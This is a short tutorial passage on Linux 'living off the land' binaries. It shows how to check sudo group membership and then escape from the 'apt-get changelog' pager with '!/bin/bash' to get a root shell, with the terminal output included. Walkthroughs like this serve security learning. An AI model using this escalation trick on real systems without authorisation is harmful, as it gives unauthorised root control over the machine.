So, now we're done poking fun at Windows, let's look at Linux. There's a nice list here about Linux commands that can pull off some veeery stupid tricks. https://gtfobins.github.io/gtfobins/find/
So, since we allready talked about why you would care about LOLBins, let's just dive right in.
For no reason, let's pick on apt and apt-get, since we know they are present on Debian based systems. First we need to have an ordinary user, and find out if that user is in the sudoers group. Lets start our investigation.
# cat /etc/group
cat /etc/group
# bingo, we have a user in sudo
sudo:x:27:nx
# list all groups present on the system
nx@xeon:~$ groups
nx cdrom floppy sudo audio dip video plugdev netdev debian-tor bluetooth kali-trusted lpadmin scanner
nx@xeon:~$
# list all group memberships for the user nx
groups nx
nx : nx cdrom floppy sudo audio dip video plugdev netdev debian-tor bluetooth kali-trusted lpadmin scanner
#list members of group sudo
getent group sudo
sudo:x:27:nx
nx@xeon:~$
Now we have a user that is a member of the sudo group, so good to go. Time for some fun.
# call apt changelog
sudo apt-get changelog apt
#output
* Bump codenames to bullseye/hirsute and adjust -security codename for
bullseye (Closes: #969932)
* Ignore failures from immediate configuration. This does not change the
actual installation ordering - we never passed the return code to the
caller and installation went underway anyway if it could be ordered at a
later stage, this just removes spurious after-the-fact errors.
(Closes: #973305, #188161, #211075, #649588) (LP: #1871268)
* Add support for Phased-Update-Percentage, previously used only by
update-manager.
* Implement update --error-on=any so that scripts can reliably check for
transient failures as well. (Closes: #594813)
#call bash
* Add support for Phased-Update-Percentage, previously used only by
update-manager.
* Implement update --error-on=any so that scripts can reliably check for
transient failures as well. (Closes: #594813)
!/bin/bash
# Output after pressing enter, notice we're running as root
nx@xeon:~$ sudo apt-get changelog apt
Henter:1 store: apt 2.1.17 Changelog
Hentede 482 kB på 0s (33,9 MB/s)
root@xeon:/home/nx#
So, there you go, detour from user to root in ten seconds :)